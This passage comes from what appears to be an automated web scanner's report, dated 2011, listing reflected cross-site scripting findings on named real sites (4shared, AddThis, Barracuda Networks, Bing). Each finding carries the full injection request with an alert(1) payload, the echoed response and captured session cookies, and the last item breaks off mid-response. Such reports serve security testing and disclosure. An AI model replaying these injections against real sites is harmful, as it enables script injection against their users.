Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 22:04:03 GMT
Content-Length: 36149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signUpBox.jsp32833"-alert(1)-"cfb3f47bbd9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.373. http://www.4shared.com/signUpBox.jsp [df parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signUpBox.jsp

Issue detail

The value of the df request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddab9"><script>alert(1)</script>9c513f7cbd was submitted in the df parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jsp?df=ddab9"><script>alert(1)</script>9c513f7cbd&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppVisited=%2FsignUpBox.jsp%3Fdf%3Dddab9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9c513f7cbd%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1298498477263; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 22:01:16 GMT
Content-Length: 7494


<div id="loginhandle">
<table cellpadding="1" cellspacing="0" width="100%">
<tr>
<td>&nbsp;<span>Sign Up</span></td>
<td><a href="javascript:signUpB
...[SNIP]...
<input type="hidden" name="df" value="ddab9"><script>alert(1)</script>9c513f7cbd">
...[SNIP]...

1.374. http://www.4shared.com/signup.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c443"-alert(1)-"b44cf3dbe12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup.jsp4c443"-alert(1)-"b44cf3dbe12 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /signup.jsp4c443&quot;-alert(1)-&quot;b44cf3dbe12
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=268104592EEF35F1BCDF06557DB32B3E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:37 GMT
Connection: close
Content-Length: 36113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signup.jsp4c443"-alert(1)-"b44cf3dbe12";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.375. http://www.4shared.com/terms.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /terms.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57f3"-alert(1)-"9c05979d3ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.jspe57f3"-alert(1)-"9c05979d3ce HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /terms.jspe57f3&quot;-alert(1)-&quot;9c05979d3ce
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7BC84744D8C8E0B856E9FF1EA865D23.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/terms.jspe57f3"-alert(1)-"9c05979d3ce";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.376. http://www.4shared.com/toolbar/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /toolbar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77634"-alert(1)-"5c89a3db097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /toolbar77634"-alert(1)-"5c89a3db097/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /toolbar77634&quot;-alert(1)-&quot;5c89a3db097/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF003921E256104E37362C0111F5A032.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/toolbar77634"-alert(1)-"5c89a3db097/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.377. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a660"-alert(1)-"4970c919f8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php2a660"-alert(1)-"4970c919f8f HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 26 Feb 2011 02:27:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rlqct9gvdd6ap0sef9fgi11516; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php2a660"-alert(1)-"4970c919f8f";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.378. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6bb59<script>alert(1)</script>a82bc7f70b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php6bb59<script>alert(1)</script>a82bc7f70b0 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 26 Feb 2011 02:27:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=0lqdr0jdrkdog37gs8hf6ue980; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php6bb59<script>alert(1)</script>a82bc7f70b0</strong>
...[SNIP]...

1.379. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 515d4"-alert(1)-"4d824db82c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/515d4"-alert(1)-"4d824db82c8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/515d4"-alert(1)-"4d824db82c8";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.380. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b85"><script>alert(1)</script>47dc06b9b56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?23b85"><script>alert(1)</script>47dc06b9b56=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
Set-Cookie: locale=+; expires=Sat, 26-Feb-2011 14:17:15 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 14:25:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 14:25:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="23b85"><script>alert(1)</script>47dc06b9b56" value="1" />
...[SNIP]...

1.381. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77966"><script>alert(1)</script>07aa399813d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/?77966"><script>alert(1)</script>07aa399813d=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 14:25:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 14:25:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="77966"><script>alert(1)</script>07aa399813d" value="1" />
...[SNIP]...

1.382. http://www.barracudanetworks.com/ns/privacy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/privacy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79583"><script>alert(1)</script>2d1c850e69a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/privacy/?79583"><script>alert(1)</script>2d1c850e69a=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 14:25:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 14:25:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="79583"><script>alert(1)</script>2d1c850e69a" value="1" />
...[SNIP]...

1.383. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/web-application-controller-overview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40caf"><script>alert(1)</script>570f923664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/web-application-controller-overview.php?40caf"><script>alert(1)</script>570f923664=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
Set-Cookie: locale=+; expires=Sat, 26-Feb-2011 02:19:53 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 02:28:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 02:28:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="40caf"><script>alert(1)</script>570f923664" value="1" />
...[SNIP]...

1.384. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assetgeneration.handler/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efa53'-alert(1)-'fbcad5d3485 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response, as the value assigned to window.CookiePath inside an inline script. Note that the same path segment is also written, unmodified, into the path attribute of the VE_LSV Set-Cookie header, so the cookie path handling should be reviewed alongside the script reflection.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/efa53'-alert(1)-'fbcad5d3485/?key=details.aag.cat.cc.pjAttr.rat.ot.sum.sf.ri.da.fea.sc.pho.rvws.wr.cou.offer.ads.sho.rat.ads.&type=text%2fcss&mkt=en-us&cb%3d20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=664a02d20838485f8faf789577ff4da5; CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100; _FS=mkt=en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 019615a11c4c47fab189450610a5c367
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:18:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/efa53'-alert(1)-'fbcad5d3485
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 19973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/efa53'-alert(1)-'fbcad5d3485';</script>
...[SNIP]...

1.385. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74cde'-alert(1)-'f8dda444ccc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response, as part of the value assigned to window.CookiePath inside an inline script. The same path segment is also written, unmodified, into the path attribute of the VE_LSV Set-Cookie header, so the cookie path handling should be reviewed alongside the script reflection.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets74cde'-alert(1)-'f8dda444ccc/img/sprites/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=664a02d20838485f8faf789577ff4da5; CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100; _FS=mkt=en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: e689498d2bb644228feb65a74a96c04c
